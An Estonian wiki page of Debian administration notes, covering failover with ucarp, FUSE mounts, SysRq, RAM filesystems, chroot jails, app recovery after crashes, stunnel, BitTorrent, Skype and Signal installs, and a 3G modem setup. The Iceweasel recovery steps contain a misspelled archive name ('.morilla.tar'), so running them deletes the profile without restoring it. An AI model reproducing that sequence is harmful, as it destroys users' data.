immutable biti saab eemaldada öeldes

# chattr -i failinimi

===ucarp kasutamine===

ucarp http://www.ucarp.org/project/ucarp tarkvara abil on võimalik korraldada kahe või enama arvuti nn aktiivset/passiiveset klustrit kasutades CARP protokolli. Klustri igal arvutil on oma individuaalne ip aadress ning lisaks on määratud üks teenuse virtuaalne ip aadress. Sõltuvalt sellest, kuidas parasjagu on klustri osalesid masteri osas kokku leppinud pakub master teenust, teised on nö kõrval-seisvas (ingl. k. standby) asendis.

Tarkvara paigaldamiseks tuleb öelda

# apt-get install ucarp

Ning seadistamiseks tuleb nt kahe komponendilise klustri ühe arvuti võrguliideste seadistusfailis /etc/network/interfaces kasutada

auto eth0
iface eth0 inet static
address 192.168.10.51
gateway 192.168.10.254
netmask 255.255.255.0

ucarp-vid 3
ucarp-vip 192.168.10.48
ucarp-password test1234
ucarp-advskew 0
ucarp-advbase 1
ucarp-master yes

iface eth0:ucarp inet static
address 192.168.10.48
netmask 255.255.255.255

ning teise arvuti puhul

auto eth0
iface eth0 inet static
address 192.168.10.52
gateway 192.168.10.254
netmask 255.255.255.0

ucarp-vid 3
ucarp-vip 192.168.10.48
ucarp-password test1234
ucarp-advskew 10
ucarp-advbase 1
ucarp-master yes

iface eth0:ucarp inet static
address 192.168.10.48
netmask 255.255.255.255

Tulemusena on kokkulepitud masteris lisaks tavalistele vürguseadetele seade eth0:ucarp

eth0:ucarp Link encap:Ethernet HWaddr 70:01:68:01:00:51
inet addr:192.168.10.48 Bcast:192.168.10.255 Mask:255.255.255.255
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

ucarp on võrreldes keepalived või heartbeat tarkvaraga tagasihoidlikemate omadustega, kuid mõnel juhul võib just see ollagi eeliseks.

===FUSE===

Kui tavaliselt toimub failisüsteemidega tegelemine, nt külgeühendamine, privilegeeritud kasujana ning nn kernel-space'is, siis FUSE (Filesystem in Userspace) http://fuse.sourceforge.net/ tehnika võimaldab seda teha tavakasutajana user-space'is. Linuxi tuum sisaldab FUSE tuge ning paketihalduses on rohkesti FUSE funktsionaalsust kasutavat tarkvara. Üldkasutatavad FUSE utiliidid on paketis fuse-utils.

====curlftpfs====

curlftpfs abil saab nö külge monteerida ftp serverist ressurssi, tarkvara paigaldamiseks tuleb öelda

# apt-get install curlftpfs

Kasutmise peab kasutaja kuuluma gruppi fuse, ressursi külgeühendamine toimub öeldes

$ curlftpfs ftp://ftp.ee.debian.ee /tmp/ftp.ee.debian.org

ja lahtiühendamiseks

$ fusermount -u /tmp/ftp.ee.debian.org

Kasutamine toimub nii nagu tavalise kohaliku failisüsteemi kasutamine.

====SSHFS====

sshfs abil saab nö külge monteerida serverist, kuhu on ssh ligipääs, ressurssi, tarkvara paigaldamiseks tuleb öelda

# apt-get install sshfs

Kasutamise peab kuuluma gruppi fuse, külgeühendamiseks sobib öelda

$ sshfs mart@loomaaed.tartu.ee:/katalooginimi-ssh-serveris /katalooginimi-kohalikus-arvutis

Lahtiühendamiseks

$ fusermount -u /katalooginimi-kohalikus-arvutis

===SysRq===

Kui Linuxi tuum hangub, siis enamikul juhtudel on ta võimeline aru saama talle nö otse saadetud signaalidest. Lenny paketihalduse tuumaga saab vaikimisi SysRq'd kasutada, väljalülitamiseks tuleb parameetrile kernel.sysrq omistada väärtus null

# sysctl -w kernel.sysrq=0

* http://en.wikipedia.org/wiki/Magic_SysRq_key

====Füüsiliselt konsoolilt====

Füüsiliselt konsoolilt saab sisestada erinevaid kombinatsioone (kui SysRq klahv pole tähistatud, siis tavaliselt toimib sellena PrintScreen)

# failisüsteemide sünkroniseerimine - Alt-SysRq-s
# failisüsteemide read-only remountimine - Alt-SysRq-u
# arvuti reboot - Alt-SysRq-b

Iga tegevuse kohta antakse terminalile ka vastav teade.

====Käsurealt====

Kui aga arvutis ollakse eemal ning mingil põhjusel on siiski võimalik talle käske anda, kuigi ta käitub piisavalt juhtimatult, et selleks ettenähtud vahenditega rebooti teha, nt 'shutdown -r now', siis saab samasid tegevusi esile kutsuda selliselt

bash# echo s > /proc/sysrq-trigger
bash# echo u > /proc/sysrq-trigger
bash# echo b > /proc/sysrq-trigger

Ammendav loetelu võimalikest sisenditest on kirjas tuuma lähtetekstide kataloogis vist failis Documentation/kernel-parameters.txt.

====Xen konsoolilt====

Xeni konsoolilt saab saata SysRq signaale valides

Ctrl+O ja täht

h väljastab nimekirja toetatud signaalidest

SysRq : HELP : loglevel0-8 reBoot tErm Full kIll saK aLlcpus\
showMem Nice powerOff showPc show-all-timers(Q) unRaw Sync showTasks \
Unmount shoW-blocked-tasks

====Serial konsoolilt====

Serial konsoolilt saab tuumale SysRq signaali saata valides Break + täht.

===RAM failisüsteemid===

RAM failisüsteem võimaldab kasutada arvuti virtuaalmälu st RAM + swap ressursse failisüsteemina, nt sellised tehnikad

* tmpfs - tundub, et 2016 aasta seisuga on see üldiselt soovitatav ram failisüsteem, mõnes kohas kirjandus väidab, et tmpfs ei võimalda failisüsteemi suurust piirata, paistab, et see siiski ei ole nii
* ramfs - legacy ramfs, 2016 aasta seisuga üldiselt ei soovitata kasutada

====tmpfs====

tmpfs võimaldab kasutada arvuti virtuaalmälu st RAM + swap ressursse failisüsteemina. Kasutamine toimub selliselt

# mkdir /mnt/tmpfs
# mount -t tmpfs -o size=48g tmpfs /mnt/tmpfs

Kuna failisüsteem asub mälus, siis ta töötab kiiresti

# dd if=/dev/zero of=/mnt/tmpfs/1G bs=1M count=1024
1024+0 records in
1024+0 records out
1073741824 bytes (1.1 GB) copied, 0.981817 s, 1.1 GB/s

Traditsiooniline tmpfs ühenduspunkt tmpfs jaoks on /dev/shm mis on ka vaikimisi Debian Lenny puhul kasutuses

# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/system-root 4.0G 3.6G 236M 94% /
tmpfs 3.9G 0 3.9G 0% /lib/init/rw
udev 10M 60K 10M 1% /dev
tmpfs 3.9G 4.0K 3.9G 1% /dev/shm
/dev/sda1 107M 82M 20M 81% /boot

Süsteemi poolt vaikimisi kasutatavate tmpfs failisüsteemides on nt selline sisu

# find /dev/shm -ls
5812 0 drwxrwxrwt 3 root root 60 Jul 19 08:25 /dev/shm/
5964 0 drwxr-xr-x 2 root root 60 Jul 19 08:25 /dev/shm/network
6019 4 -rw-r--r-- 1 root root 16 Jul 19 08:25 /dev/shm/network/ifstate

ja

# find /lib/init/rw
/lib/init/rw
/lib/init/rw/sendsigs.omit.d
/lib/init/rw/sendsigs.omit.d/portmap
/lib/init/rw/.ramfs

Lisaks on /dev failisüsteem udev kasutamisel tmpfs peal, üldiselt sobib konkreetse süsteemi puhul küsida

# mount | grep tmpfs

====ramfs====

# mkdir /mnt/ramfs
# mount -t ramfs -o size=200m ramfs /mnt/ramfs

====Kasulikud lisamaterjalid====

* https://www.jamescoyle.net/knowledge/951-the-difference-between-a-tmpfs-and-ramfs-ram-disk

===makejail abil chroot keskkonna moodustamine===

Makejail programm abil saab moodustada chroot keskkonda, paigaldamiseks sobib öelda

# apt-get install makejail

Programmi tööd juhib seadistusfail, nt /root/makejail-bash.py, kus on antud juhul näidatud

* kuhu kataloogi moodustada chroot keskkond
* lisada sinna /bin/bash shell ning vastavad teegid lisada (antud juhul kasutatakse AMD64 platvormi)

# cat /root/makejail-bash.py
chroot="/home/mart"
forceCopy=["/lib64/ld-linux-x86-64.so.2", "/bin/bash","/lib/ld-linux-x86-64.so.2"]

moodustame kataloogi /home/mart

bash# mkdir /home/mart

ning moodustame sinna alla chroot keskkonna

bash# makejail /root/makejail-bash.py
Loading configuration file /root/makejail.py
Defining chroot = '/home/mart'
Defining forceCopy = ['/bin/bash']
Chroot directory is /home/mart
Initializing list of running processes
Executing : ps -e
Creating temp dir /tmp/makejail_logs
Adding files matching '/bin/bash'
Checking path '/bin/bash'
Dir '/home/mart/bin' missing
Checking path '/bin'
Making dir /home/mart/bin
..
Creating 'lib/libncurses.so.5' as a symlink to 'libncurses.so.5.5' (pwd=/home/mart/lib)
Executing : file /lib/libncurses.so.5
Sleeping for 2.00 seconds

Tulemusena tekib selline failistruktuur

bash# cd /home
bash# find mart -ls
507962 4 drwxr-xr-x 4 root root 4096 Sep 9 15:12 mart
507963 4 drwxr-xr-x 2 root root 4096 Sep 9 15:12 mart/lib
507968 1260 -rwxr-xr-x 1 root root 1286104 May 15 13:19 mart/lib/libc-2.3.6.so
507972 0 lrwxrwxrwx 1 root root 17 Sep 9 15:12 mart/lib/libncurses.so.5 -> libncurses.so.5.5
507973 100 -rwxr-xr-x 1 root root 97928 May 15 13:19 mart/lib/ld-2.3.6.so
507967 368 -rw-r--r-- 1 root root 369728 Oct 19 2006 mart/lib/libncurses.so.5.5
507974 0 lrwxrwxrwx 1 root root 11 Sep 9 15:12 mart/lib/ld-linux-x86-64.so.2 -> ld-2.3.6.so
507970 12 -rw-r--r-- 1 root root 10392 May 15 13:19 mart/lib/libdl-2.3.6.so
507971 0 lrwxrwxrwx 1 root root 14 Sep 9 15:12 mart/lib/libdl.so.2 -> libdl-2.3.6.so
507969 0 lrwxrwxrwx 1 root root 13 Sep 9 15:12 mart/lib/libc.so.6 -> libc-2.3.6.so
507964 0 lrwxrwxrwx 1 root root 4 Sep 9 15:12 mart/lib64 -> /lib
507965 4 drwxr-xr-x 2 root root 4096 Sep 9 15:12 mart/bin
507966 756 -rwxr-xr-x 1 root root 769368 Dec 11 2006 mart/bin/bash

Selleks, et veenduda kas kasutaja chroot keskkonna tekitamine õnnestus tuleb öelda, mille vastuseks saab shelli (ja siis öelda exit)

bash# chroot /home/mart
bash#

Nt sobib makejaili kasutada OpenSSH kasutajate chrootimisel.

Seda, kas protsess töötab chroot keskkonnas saab kontrollida nt küsides vastava pid kohta, kuis link on mitte / kataloogile, siis on protsess näidatud kataloogi chroot'itud

# ls -ld /proc/11091/root
lrwxrwxrwx 1 root root 0 Feb 2 22:39 /proc/11091/root -> /home/mart

===Peale crashi Debiani käima-aitamine===

Kui Debiani süsteem on crashinud, nt voolu kadumise tõttu, siis enamasti ext3 failisüsteem korrigeerib ennast ise, aga mõned rakendused on segaduses.

====Skype====

Skype teatab vahel, et 'Another Skype instance may exist', sel puhul ei pruugi aitada lock failide eemaldamine

$ rm .Skype/shared.lck .Skype/martkask/config.lck

aga võib aitada selline järgnevus

* käivitada Skype -dhpath võtmega ja logida korra sisse ning sulgeda programm (Quit), st nii, et protsess skype kaob

$ skype --dbpath=/home/mart/skype-tmp

* selleks, et chat history jms säiliks, kopeerida vana sisuga üle kontole vastava kastaloogi sisu

$ rsync -avH /home/mart/.Skype/martkask/ /home/mart/skype-tmp/martkask
$ mv /home/mart/.Skype /home/mart/.Skype-20090811-mittetootav
$ mv /home/mart/skype-tmp /home/mart/.Skype

* katsuda kasutada Skype'i edasi tavapärasel moel

====Icedove====

Programm ütleb käivitamisel, et '...', aitab kustutada failid

$ rm /home/mart/.mozilla-thunderbird/r4t56nog.default/.parentlock
$ rm /home/mart/.mozilla-thunderbird/r4t56nog.default/lock

ja proovida tavalisel moel edasi kasutada. Kontod jms seadistused peaksid nõnda säilima.

====Iceweasel====

Kui Iceweaseli kataloog .mozilla on ühendatud üle NFS'i siis on peale süsteemi crashi Iceweasel üsna katki. St *\lock\* failide eemaldamine näib mitte aitavat jne, väidetavalt on asi NFS ja Iceweaseli koostöös, tundub, et aitab korra .mozilla kataloog kokku ja lahti pakkida

$ tar cf .mozilla.tar .mozilla
$ rm -rf .mozilla
$ tar xf .morilla.tar
$ rm .mozilla.tar

===Stunnel4 kasutamine===

Stunnel http://www.stunnel.org/ tarkvara võimaldab ühendada kokku krüptimist iseenesest mitte toetavat klienti ja krüptitud teenust, või vastupidi. Või korraldada krüptimist mitte toetava kliendi ja serveri vahel siiski krüptitud andmevahetust.

Paigaldamiseks tuleb öelda

# apt-get install stunnel4

====Stunnel4 kliendi kasutamine krüptitud teenuse poole pöördumisel====

Seadistusfaili /etc/stunnel/stunnel.conf sobib kirjutada

sslVersion = SSLv3
chroot = /var/lib/stunnel4/
setuid = stunnel4
setgid = stunnel4
pid = /stunnel4.pid

socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1

output = /var/log/stunnel4/stunnel.log

client = yes

[smtps]
accept = 127.0.0.1:46525
connect = smtps.loomaaed.tartu.ee:465

tulemusena saab pöörduda smtp kliendiga krüptimata localhost:46525 porti, mida vahendatakse smtps.loomaaed.tartu.ee 465 krüptitud pordiga.

===Terminalihaldusprogrammi Screen kasutamine===

screen tarkvara peab olema paigaldatud kaughallatavasse arvutisse

# apt-get install screen

* screen käivitamiseks logida eemal olevasse arvutisse sisse ja öelda

$ screen

* Ctrl-a, c - tekita uus aken
* Ctrl-a, n - liigu järgmisse aknasse
* Ctrl-a, d - lase screenist lahti
* esita nimekiri arvutis olevatest kasutaja screenidest

$ screen -ls
There is a screen on:
2807.pts-5.pg2a (Detached)
1 Socket in /var/run/screen/S-postgres.

* ühendu näidatud screeniga

$ screen -r 2807.pts-5.pg2a

Süsteemis töötavate screenidele vastavaid protsesse näeb öeldes

# ps aux | grep SCREEN

Mitmekasutajarežiimis screen kasutamiseks saavad järgmised kasutajad ühenduda külge öeldes

$ screen -x

Screen logimiseks on -L võti, logi kirjutatakse faili screenlogN.log, või ^a-H.

Kui screen on attached olekus, aga vastav terminaliaken on nö kadunud, siis resumemiseks tuleb enne force'ida detach

$ screen -D

===IEEE 802.1X kasutamine===

TODO

* http://en.wikipedia.org/wiki/IEEE_802.1X
* http://www.cesnet.cz/doc/techzpravy/2007/802.1x-wired-authentication/

===Bittorrent===

Bittorrent on levinud P2P (peer-to-peer, ingl. k. osaliselt-osalisele) andmevahetusprotokoll, millele on iseloomulik, et suhtlemine leiab olulises osas aset otse osaliste endi vahel. Andmevahetusprotokoll on orienteeritud pigem suuremamahulisema andmevahetuse jaoks ning kopeeritud andmeid reeglina ei saa kasutada nö reaalajas kopeerimise käigus, vaid peale kopeerimise lõppu sobiva rakendusega. Nt kui tegu on video-materjaliga, siis saab seda videot asuda vaatama peale kopeerimise lõppu, mitte aga kopeerimise ajal.

====Bittorrenti kliendi kasutamine andmete kopeerimiseks====

Andmete kopeerimiseks võrgust kohalikku arvutisse on vaja teada huvipakkuva ressursi nö aadressi, mis esineb .torrent faili kujul. Nt jagatakse aadressilt http://www.debian.org/CD/torrent-cd/ edasi liikudes Debian operatsioonisüsteemi .torrent faile

http://cdimage.debian.org/debian-cd/5.0.3/amd64/bt-cd/debian-503-amd64-CD-1.iso.torrent

Debian Linux sisaldab mitmeid bittorrent kliente (nt rtorrent, qbittorrent, bittorrent, bittornado jt), mis võivad erineda kõigi või mõne aspekti poolest järgnevatest

* millises mahus on bittorrent protokoll toetatud
* kas programmil on graafiline, pseudo-graafiline (nn curses) või käsurea kasutajaliides

Konkreetselt qbittorrent kasutajaliides näeb välja nt selline

[[Pilt:bittorrent-1.gif]]

kust on näha

* kopeeritakse faili debian-503-amd64-CD-1.iso
* DL Speed on allalaadimise kiirus ja UP Speed üleslaadimise kiirus
* Seeds/Leechs näitab kui paljudelt osalistelt kasutaja kopeerib ja kui paljud temalt edasi kopeerivad
* sakil Search saab vaikimisi qbittorrenti klienti seadistatud trackereid kasutada otsinguks ja otsingu tulemustena leitud .torrenteid kopeerida

Kopeerimise alustamiseks tuleb valida nupp BT ning kopeerida sinna .torrent faili aadress, nt

http://cdimage.debian.org/debian-cd/5.0.3/amd64/bt-cd/debian-503-amd64-CD-1.iso.torrent

====Bittorrent kliendi kasutamine andmete jagamiseks====

Bittorrentiga on algajal kasutajal oluliselt lihtsam kopeerida andmeid endale kui pakkuda välja oma andmeid teistele kasutajatele.

.torrenti moodustamiseks sobib öelda (programmid on paketist bittorrent) eeldusel, et on olemas fail andmed.iso

$ btmakemetafile.bittorrent andmed.iso http://torrent.loomaaed.tartu.ee:80/announce

kus

* andmed.iso - lähtematerjal, mida asutakse välja jagama
* http://torrent.loomaaed.tartu.ee:80/announce - trackeri aadress

Käsu tulemusena moodustatakse vastav .torrent fail

andmed.iso.torrent

ning seejärel saab seda välja jagada nt nii

$ btdownloadcurses.bittorrent andmed.iso.torrent

====Kohaliku trackeri kasutamine====

bittorrent pakett sisaldab bittorrent tracker programmi bttrack. Trackeri käivitamiseks sobib öelda lihtsamal juhul

# bttrack --dfile dfail.log

mille tulemusena käivitub pordil 80 spetsiaalne http server, mis on valmis võtma vastu bittorrent klientide poolt infot andmete väljajagamise kohta ja teenindama bittorrenti kliente, kes soovivad andmeid endale kopeerida.

Selliselt käivitatud trackerit saab kasutada nt organisatsiooni siseselt, iseasi kas sellisel kasutusel erilist praktilist väärtust on.

====Transmission====

Transmission tarkvaral on mitmed kasutajaliidesed, muu hulgas käsurealt kasutamise võimalus. Tarkvara paigaldamiseks sobib öelda

# apt-get install transmission-cli

Seejärel tuleb tekitada seadistusfail nt sellise sisuga ning moodustada näidatud kataloogid

$ cat ~/.config/transmission/settings.json
{
"download-dir": "/home/priit/transm",
"incomplete-dir": "/home/priit/transm-incomplete",
"incomplete-dir-enabled": true,
"open-dialog-dir": "/home/priit",
"recent-download-dir-1": "/home/priit/transm",
}

kusjuures esimesel käivitamisel kirjutab sinna programm paljude muude seadistusparameetrite vaikeväärtused lisaks juurde. Käivitamiseks sobib öelda nt

$ /usr/bin/transmission-cli /tmp/proxmox-ve_3.1-93bf03d4-8.iso.torrent

Tulemusena tekib fail

transm/proxmox-ve_3.1-93bf03d4-8.iso

===Amule===

TODO

===Debian Live===

Debian Live projekt http://debian-live.alioth.debian.org/ tegeleb selliste vahendite ettevalmistamisega, millega kasutaja saab moodustada oma vajaduste rahuldamiseks sobivaid operatsioonisüsteemi tõmmiseid. Live keskkonnale on iseloomulik, et operatsioonisüsteem laaditakse mingilt nö mitte-kõvakettalt, vaid nt CD/DVD plaadilt, USB pulgalt või võrgust ning et sellise keskkonna kasutamine ei mõjuta arvuti lokaalse kõvaketta olekut.

====live-helper====

Tarkvara paigaldamiseks sobib öelda

# apt-get install live-helper

Tarkvara kasutamist on kirjeldatud aadressil http://live.debian.net/manual/html/index.html.

Nt alglaadiva usb pulga tõmmise ettevalmistamiseks sobib kasutada

# mkdir /usr/src/live
# cd /usr/src/live
# ld_config
# ld_build -b usb-hdd

Tulemusena tekib fail binary.img mida saab kopeerida nt Windows Vista keskkonnas USB pulgale programmiga http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/.

Tulemuse katsetamiseks sobib qemu, sedasi

# qemu -hda binary.img

====live-magic====

Tarkvara paigaldamiseks sobib öelda

# apt-get install live-magic

Debian Live Magic programmi käivitamiseks tuleb öelda juurkasutajana

# live-magic

ning avaneb järgnev pilt

[[Pilt:Debian-live-1.gif]]

kus tuleb valida, millist Live keskkonda ettevalmistama asutakse.

===Slack kasutamine===

Slack https://slack.com/ paigaldamiseks sobib kopeerida .deb fail ning öelda

# apt-get install failinimi.deb

Paistab, et tarkvara paigaldamise käigus tekitatakse fail

# cat /mnt/kontdeb9/etc/apt/sources.list.d/slack.list
deb https://packagecloud.io/slacktechnologies/slack/debian/ jessie main

===Signal kasutamine===

Tarkvara kopeerimiseks https://signal.org/download/

<pre>
# cat /etc/apt/sources.list.d/signal-xenial.list
deb [arch=amd64] https://updates.signal.org/desktop/apt xenial main

# curl -s https://updates.signal.org/desktop/apt/keys.asc | sudo apt-key add -
</pre>

ja paigaldamiseks

<pre>
# apt-get update
# apt-get install signal-desktop
</pre>

===Skype kasutamine===

Aadressil http://www.skype.com/ jagatakse Skype tarkvara mitmel erineval kujul

* 32 bit
* 64 bit
* staatiliselt lingitud

====2017 - Skype v. 5.0 kasutamine====

Märkus: 2017 kevadel on v. 5.0 beta, mis praktiliselt tähendab, et muidu töötab, aga chat histori otsingut pole.

Lisada võti

# curl https://repo.skype.com/data/SKYPE-GPG-KEY | sudo apt-key add -

lisada fail /etc/apt/sources.list.d/skypeforlinux.list

# cat /etc/apt/sources.list.d/skypeforlinux.list
deb [arch=amd64] https://repo.skype.com/deb stable main

ja paigaldada

# apt-get update
# apt-get install skypeforlinux

Kasulikud lisamaterjalid

* https://www.ubuntuupdates.org/ppa/skypeforlinux

====pre 2017 - Skype kasutamine 64 bit keskkonnas====

Süsteemi etteavalmistamisel tuleb paigaldada paketid ia32-libs-gtk ja libqt4-dev

# apt-get install ia32-libs-gtk libqt4-dev

Seejärel skype 64 bit pakett, muus osas peaks töötama kuigi käivitamisel öeldakse

$ skype
Gtk-Message: Failed to load module "canberra-gtk-module": \
/usr/lib/gtk-2.0/modules/libcanberra-gtk-module.so: wrong ELF class: ELFCLASS64
(<unknown>:6901): Gtk-WARNING **: /usr/lib/gtk-2.0/2.10.0/engines/libglide.so:
wrong ELF class: ELFCLASS64

====Skype kasutamine Debian Wheezy multiarch keskkonnas====

* kopeerida Skype lokaalsesse reposse - http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_paketihalduse_kasutamine#Privaatse_failis.C3.BCsteemi_repositooriumi_kasutamine
* lisada süsteemile i386 arhitektuur - http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_kasutamine#Multiarch_kasutamine
* paigaldada skype

# apt-get install skype:i386

====Skype v. 8.x kasutamine====

Kui järgmine v. 8.y versioon ei sobi, siis saab eelmise x. 8.x paigaldada nt selliselt

# apt-get install skypeforlinux=8.11.0.4

Nimekiri variantidest on näha aadressil https://repo.skype.com/deb/pool/main/s/skypeforlinux/

====Skyperious====

Head inimesed on programmeerinud Python keeles tarkvara Skyperious http://suurjaak.github.io/Skyperious/index.html, mille abil saab Skype andmebaaside sisu, st praktiliselt jutuajamist ajalugu, uurida ilma Skype programmi enda, võrguühenduse jms olemasoluta. Tundub, et programm kasutab asjaolu, et vastav andmebaas on praktiliselt SQLite andmebaas. Praktiliselt võib see olla abiks kui Skype versiooni uuendamisel ei õnnestu chat history sisu uude versiooni kaasa võtta, nt v. 4.2 -> 4.3 uuendamisel Linux all. Skyperiuos kasutajaliides paistab selline

[[Pilt:Skyperious-1.gif]]

Tarkvara paigaldamist kirjeldatakse aadressil https://github.com/suurjaak/Skyperious. Lühidalt tuleb Debian Jessie all öelda

# apt-get install wx2.8-i18n libwxgtk2.8-dev libgtk2.0-dev
# apt-get install python-wxgtk2.8 python-wxtools
# apt-get install python-pip

Seejärel lähtetekst lahti pakkida ja öelda

# pip install --allow-all-external --allow-unverified -r requirements

Kasutajana käivitamisel öeldakse alustuseks

$ skyperious.sh
-su: skyperious.sh: /bin/sh^M: bad interpreter: No such file or directory

millest saab üle nn dos reavahetuste eemaldamisega

# fromdos skyperious.sh

====Misc====

Skype vestlusaknas saab teksti parandada nn Sed süntaksit kasutades

mart: priiti, ei ole võimalik

,-------------------------------,
| s/priiti/Priit/ |
|_______________________________|

http://share.skype.com/sites/linux/2009/09/some_explanations.html

===PulseAudio kasutamine===

http://pulseaudio.org/

===Huawei netipulga kasutamine===

2010 aastal on populaarne kasutada mobiilse internetiühenduse teenust Huawei USB netipulga abil. Sellist tüüpi netipulgad on sisuliselt GSM modemid, mis ühendatakse arvutiga USB kaudu ning mille kasutamiseks peab seadmesse olema paigaldatud mobiilside operaatori kehtiv SIM-kaart (Subscriber Identity Module). Selline netipulk ei ole kuidagi seotud wifiga ning seda saab kasutada asudes mobiilside operaatori levialas. Netipulga kasutamiseks peab olema arvutisse paigaldatud PPP kliendi tarkvara, nt wvdial ja arvuti oskama kasutada USB-serial seadmeid.

Kasulikud lisamaterjalid

* http://wiki.debian.org/Modem/3G

====Riistvara====

Näiteks olgu kasutada Huawei E620 USB Modem seade ning teenusepakkuja EMT andmesideteenus.

# lsusb
...
Bus 002 Device 003: ID 12d1:1001 Huawei Technologies Co., Ltd. E620 USB Modem

====Tarkvara====

Netipulga kasutamiseks piisab Debian Lenny paketihalduse tarkvarast, st vajalikest tuuma moodulitest ning wvdial programmist, mille paigaldamiseks sobib öelda

# apt-get install wvdial

====Seadistamine ja käivitamine====

Esmalt tuleb laadida maha usb-storage, option ja usbserial tuuma moodulid

# rmmmod usb-storage
# rmmod option
# rmmod usbserial

ning laadida usbserial sobivate parameetritega, vastavalt käesolevale lsusb väljundile, nt

# modprobe usbserial vendor=0x12d1 product=0x1001

Tulemusena on kasutada USB-serial seadmed

# ls -l /dev/ttyUSB*
crw-rw---- 1 root dialout 188, 0 Apr 27 23:46 /dev/ttyUSB0
crw-rw---- 1 root dialout 188, 1 Apr 27 23:15 /dev/ttyUSB1
crw-rw---- 1 root dialout 188, 2 Apr 27 23:15 /dev/ttyUSB2
crw-rw---- 1 root dialout 188, 3 Apr 27 23:15 /dev/ttyUSB3

wvdial tarkvara tööd juhib seadistusfail /etc/wvdial.conf

# cat /etc/wvdial.conf
[Dialer Defaults]
Phone = *99***1#
Username = username
Password = password
Stupid Mode = 1
Dial Command = ATDT

[Dialer hsdpa]
Modem = /dev/ttyUSB0
Baud = 460800
Init2 = ATZ
Init3 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ISDN = 0
Modem Type = Analog Modem

kus

* Phone - väärtus sõltub teenusepakkujast

Käivitamiseks sobib öelda juurkasutajana

# wvdial hsdpa
--> WvDial: Internet dialer version 1.60
--> Cannot get information for serial port.
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: ATZ
ATZ
OK
--> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
OK
--> Modem initialized.
--> Sending: ATDT*99***1#
--> Waiting for carrier.
ATDT*99***1#
CONNECT
--> Carrier detected. Starting PPP immediately.
--> Starting pppd at Tue Apr 27 23:41:55 2010
--> Pid of pppd: 7879
--> Using interface ppp0
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> local IP address 192.168.3.91
--> pppd: @« @« x«
--> remote IP address 10.64.64.64
--> pppd: @« @« x«
--> primary DNS address 192.168.32.116
--> pppd: @« @« x«
--> secondary DNS address 192.168.32.115
--> pppd: @« @« x«

Tulemusena tekib süsteemi juurde PPP seade, nt

# ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol
inet addr:192.168.3.91 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:7 errors:3 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:118 (118.0 B) TX bytes:157 (157.0 B)

====Netipulga kasutamine====

Peale PPP lingi tekkimist piisab liiklus ruutida üle selle lingi ning saab kasutada võrku, nt

# route add -net 172.23.0.0 netmask 255.255.0.0 gw 192.168.3.91

Lisaks nö sihipärasele mobiilsele töökohale andmeside tekitamisele on võimalikud nt sellised kasutusalad

* ühendada võrku arvuteid, mida muul viisil võib olla tülikas ühendada
* ühendada arvutile külge alternatiivne andmesidekanal (nt monitooringuarvutist teadete saatmiseks)

Kasutamisel tuleb arvestada, et läbi lisandunud seadme on võimalik lisaks välja pöördumisele ka sisse pöörduda, seepärast tasub kaaluda seoses netipulgaga paketifiltri kasutamist.

===ffmpeg kasutamine===

ffmpeg tarkvara abil saab ekraanil toimuvat nö videona salvestada

$ ffmpeg -f x11grab -s 720x480 -r 23.976 -i :0.0 /tmp/file.mpg

QuickTime andmete teisendamine

$ ffmpeg -i video-in.mov -vcodec mpeg4 video-out.avi

QuickTime teisendamine Digital Video formaati

$ ffmpeg -i fail.mov -s pal -r pal -aspect 4:3 -ar 48000 -ac 2 fail.dv

Taasesitamine nö ressursisäästlikult

$ mplayer -vo xv -vfm ffmpeg -lavdopts lowres=1:fast:skiploopfilter=1 video-out.avi

Kasulikud lisamaterjalid

* http://viki.pingviin.org/MPlayer
* http://www.kinodv.org/

===Märkused===

* Selleks, et vaikimisi ei seataks pakettidele DF (don't fragment), sobib öelda

# sysctl -w net.ipv4.ip_no_pmtu_disc=1

* arvuti viimaseid reboote näitab käsk

# last reboot -f /var/log/wtmp.1
reboot system boot 3.16.0-4-amd64 Fri Aug 7 00:35 - 02:03 (38+01:27)
reboot system boot 3.16.0-4-amd64 Wed Aug 5 00:14 - 00:35 (2+00:20)
reboot system boot 3.16.0-4-amd64 Tue Aug 4 22:57 - 23:51 (00:53)
reboot system boot 3.16.0-4-amd64 Tue Aug 4 22:56 - 22:57 (00:01)

kus esimese rea teine kellaaeg on käesolev aeg (ja liigub), sulgudes on praktiliselt arvuti käesolev uptime; teiste ridade sulgudes on vastavad uptime ajad

* Failide-alamkataloogide-jms arv kataloogis

# for i in `ls -d /*` ; do echo -n "$i: "; find $i | wc -l; done

===PCMCIA seadmete kasutamine===

# apt-get install pcmciautils

===ExpressCard seadmete kasutamine===

Reeglina paistavad ExpressCard http://en.wikipedia.org/wiki/ExpressCard seadmed operatsioonisüsteemile USB seadmetena.

===syslog-ng kasutamine logiserverina===

syslog-ng http://www.balabit.com/network-security/syslog-ng/ sobib kasutada logiserveris ja tal on sellised omadused

* TODO

Debian Lenny sisaldab syslog-ng versioon 2.0, paigaldamiseks tuleb öelda

# apt-get install syslog-ng

Tarkvara tööd juhib seadistusfail /etc/syslog-ng/syslog-ng.conf

===Failisüsteem===

Debiani failisüsteemiga on seotud operatsioonisüsteemi seisukohalt sellised üldised asjaolud

* /proc ja /sys kataloogid on nö vaated töötavale linuxi tuumale

====Named ja unnamed pipe====

Pipe on FIFO ja selle instrumendi abil saavad programmid omavahel andmeid vahetada, nt named pipe puhul sobib ühes aknas öelda

$ mkfifo /tmp/fifonimi
$ cat < /tmp/fifonimi

ja teises aknas öelda

